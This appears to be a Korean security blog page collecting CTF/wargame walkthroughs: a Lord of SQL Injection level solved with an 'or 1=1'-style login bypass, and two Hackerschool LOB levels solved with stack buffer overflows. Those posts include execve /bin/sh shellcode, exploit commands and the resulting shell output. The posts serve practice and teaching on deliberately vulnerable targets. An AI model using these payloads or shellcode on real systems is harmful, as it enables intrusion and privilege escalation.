Gremlin

LORD OF SQL INJECTION [gremlin] 풀이 2019.10.22
해커스쿨 LOB LEVEL2 [gremlin -> cobolt] 풀이 2018.02.10
해커스쿨 LOB LEVEL1 [gate -> gremlin] 풀이 2018.02.10

PREV 1 NEXT

LORD OF SQL INJECTION [gremlin] 풀이

2019. 10. 22. 14:47

LORD OF SQLINJECTION

https://los.rubiya.kr

Lord of SQLInjection

los.rubiya.kr

gremlin

1
2
3
4
5
6
7
8
9
10
11
12
13

 
<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); // do not try to attack another table, database!
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) solve("gremlin");
  highlight_file(__FILE__);
?>
Colored by Color Scripter

cs

if($result['id']) solve("gremlin");

id만 찾아내면 문제가 풀린다.

id를 admin으로 두고, pw을 무조건 참이되도록 pw='1' or '1'='1'로 만들면 된다.

쿼리에 아래와 같이 입력하면 된다.

id=admin&pw=1' or '1'='1

저작자표시 비영리 동일조건

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

LORD OF SQL INJECTION [darkelf] 풀이 (0)	2019.10.27
LORD OF SQL INJECTION [wolfman] 풀이 (0)	2019.10.26
LORD OF SQL INJECTION [orc] 풀이 (0)	2019.10.25
LORD OF SQL INJECTION [goblin] 풀이 (0)	2019.10.24
LORD OF SQL INJECTION [cobolt] 풀이 (0)	2019.10.23

해커스쿨 LOB LEVEL2 [gremlin -> cobolt] 풀이

2018. 2. 10. 21:31

해커스쿨 LOB LEVEL2 [gremlin -> cobolt] 풀이

M4ndU

해커스쿨 LOB [gremlin -> cobolt] 풀이입니다.

ID | gremlin

PW | hello bof world

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

$ bash2

그리고

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat [문제이름].c

를 이용해 소스코드를 확인합시다.

Password:

[gremlin@localhost gremlin]$ bash2

[gremlin@localhost gremlin]$ ls -l

total 16

-rwsr-sr-x 1 cobolt cobolt 11970 Feb 26 2010 cobolt

-rw-r--r-- 1 gremlin gremlin 291 Mar 29 2010 cobolt.c

[gremlin@localhost gremlin]$ cat cobolt.c

The Lord of the BOF : The Fellowship of the BOF

- cobolt

- small buffer

int main(int argc, char *argv[])

{

char buffer[16];

if(argc < 2){

printf("argv error\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

이번엔 버퍼가 16밖에 되지 않네요. 하지만 환경변수를 사용하면 버퍼의 크기는 상관이 없습니다!

gdb를 통해 buffer와 리턴주소간 거리를 구해봅시다.

[gremlin@localhost gremlin]$ gdb -q cobolt

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x8048430 <main>: push %ebp

0x8048431 <main+1>: mov %ebp,%esp

0x8048433 <main+3>: sub %esp,16

0x8048436 <main+6>: cmp DWORD PTR [%ebp+8],1

0x804843a <main+10>: jg 0x8048453 <main+35>

0x804843c <main+12>: push 0x80484d0

0x8048441 <main+17>: call 0x8048350 <printf>

0x8048446 <main+22>: add %esp,4

0x8048449 <main+25>: push 0

0x804844b <main+27>: call 0x8048360 <exit>

0x8048450 <main+32>: add %esp,4

0x8048453 <main+35>: mov %eax,DWORD PTR [%ebp+12]

0x8048456 <main+38>: add %eax,4

0x8048459 <main+41>: mov %edx,DWORD PTR [%eax]

0x804845b <main+43>: push %edx

0x804845c <main+44>: lea %eax,[%ebp-16]

0x804845f <main+47>: push %eax

0x8048460 <main+48>: call 0x8048370 <strcpy>

0x8048465 <main+53>: add %esp,8

0x8048468 <main+56>: lea %eax,[%ebp-16]

0x804846b <main+59>: push %eax

0x804846c <main+60>: push 0x80484dc

---Type <return> to continue, or q <return> to quit---

0x8048471 <main+65>: call 0x8048350 <printf>

0x8048476 <main+70>: add %esp,8

0x8048479 <main+73>: leave

0x804847a <main+74>: ret

buffer가 ebp-16이니 dummy가 없네요.

바로 환경변수 설정해 줍시다. 이번에도 41바이트 쉘코드를 사용했습니다.

[gremlin@localhost gremlin]$ mkdir tmp

[gremlin@localhost gremlin]$ cd tmp

[gremlin@localhost tmp]$ export EGG=`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

[gremlin@localhost tmp]$ echo 'int main() { printf("ADDR -> 0x%x\n", getenv("EGG")); } ' > getenv.c

[gremlin@localhost tmp]$ gcc getenv.c -o getenv

[gremlin@localhost tmp]$ ./getenv

ADDR -> 0xbffffe8d

[gremlin@localhost tmp]$ cd ..

[gremlin@localhost gremlin]$ ./cobolt `python -c 'print "A"*20+"\x8d\xfe\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAA랞?

bash$ my-pass

euid = 502

hacking exposed

깔끔

다음레벨로 가즈아ㅏㅏ

저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL6 [wolfman-> darkelf] 풀이 (1)	2018.02.11
해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL4 [goblin -> orc] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL3 [cobolt -> goblin] 풀이 (0)	2018.02.10
해커스쿨 LOB LEVEL1 [gate -> gremlin] 풀이 (0)	2018.02.10

해커스쿨 LOB LEVEL1 [gate -> gremlin] 풀이

2018. 2. 10. 15:31

해커스쿨 LOB LEVEL1 [gate -> gremlin] 풀이

M4ndU

해커스쿨 LOB [gate -> gremlin] 풀이입니다.

ID | gate

PW | gate

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

$ bash2

그리고

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat [문제이름].c

를 이용해 소스코드를 확인합시다.

Password:

Last login: Sat Feb 10 20:32:49 on tty1

[gate@localhost gate]$ bash2

[gate@localhost gate]$ ls -l

total 16

-rwsr-sr-x 1 gremlin gremlin 11987 Feb 26 2010 gremlin

-rw-rw-r-- 1 gate gate 272 Mar 29 2010 gremlin.c

[gate@localhost gate]$ cat gremlin.c

The Lord of the BOF : The Fellowship of the BOF

- gremlin

- simple BOF

int main(int argc, char *argv[])

{

char buffer[256];

if(argc < 2){

printf("argv error\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

Simple BOF문제라고 하네요.

소스를 보면 256바이트 크기인 buffer에 무제한으로 입력을 받네요.

buffer와 리턴주소 간의 거리를 구하고 쉘코드를 buffer 또는 환경변수에 올려서 쉘을 따면 되겠네요.

저는 환경변수를 이용하겠습니다.

일단 문제 파일을 gdb로 까봅시다.

[gate@localhost gate]$ gdb gremlin -q

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x8048430 <main>: push %ebp

0x8048431 <main+1>: mov %ebp,%esp

0x8048433 <main+3>: sub %esp,0x100

0x8048439 <main+9>: cmp DWORD PTR [%ebp+8],1

0x804843d <main+13>: jg 0x8048456 <main+38>

0x804843f <main+15>: push 0x80484e0

0x8048444 <main+20>: call 0x8048350 <printf>

0x8048449 <main+25>: add %esp,4

0x804844c <main+28>: push 0

0x804844e <main+30>: call 0x8048360 <exit>

0x8048453 <main+35>: add %esp,4

0x8048456 <main+38>: mov %eax,DWORD PTR [%ebp+12]

0x8048459 <main+41>: add %eax,4

0x804845c <main+44>: mov %edx,DWORD PTR [%eax]

0x804845e <main+46>: push %edx

0x804845f <main+47>: lea %eax,[%ebp-256]

0x8048465 <main+53>: push %eax

0x8048466 <main+54>: call 0x8048370 <strcpy>

0x804846b <main+59>: add %esp,8

0x804846e <main+62>: lea %eax,[%ebp-256]

0x8048474 <main+68>: push %eax

0x8048475 <main+69>: push 0x80484ec

0x804847a <main+74>: call 0x8048350 <printf>

0x804847f <main+79>: add %esp,8

0x8048482 <main+82>: leave

0x8048483 <main+83>: ret

*main+62 를 통해 buffer가 ebp-256에 있는 것을 알 수 있습니다.

buffer의 크기가 256이니 dummy없이 바로 buffer - sfp - ret 인 것 같습니다.

이제 환경변수를 설정해 줍시다.

41바이트 쉘코드를 사용했습니다.

[gate@localhost gate]$ cd tmp/

[gate@localhost tmp]$ export EGG=`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

[gate@localhost tmp]$ echo 'int main() { printf("ADDR -> 0x%x\n", getenv("EGG")); } ' > getenv.c

[gate@localhost tmp]$ gcc getenv.c -o getenv

[gate@localhost tmp]$

[gate@localhost tmp]$ ./g

getenv gremlin

[gate@localhost tmp]$ ./g

getenv gremlin

[gate@localhost tmp]$ ./getenv

ADDR -> 0xbffffe9f

0xbffffe9f를 리턴주소로 두고 공격을 하면 되겠네요.

./gremlin `python -c 'print "A"*260+"\x9f\xfe\xff\xbf"'`

[gate@localhost gate]$ ./gremlin `python -c 'print "A"*260+"\x9f\xfe\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA잷?

bash$ my-pass

euid = 501

hello bof world

bash$

다음 레벨로 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏ

저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL6 [wolfman-> darkelf] 풀이 (1)	2018.02.11
해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL4 [goblin -> orc] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL3 [cobolt -> goblin] 풀이 (0)	2018.02.10
해커스쿨 LOB LEVEL2 [gremlin -> cobolt] 풀이 (0)	2018.02.10

PREV 1 NEXT

M4ndU의 만두만두한 블로그

Gremlin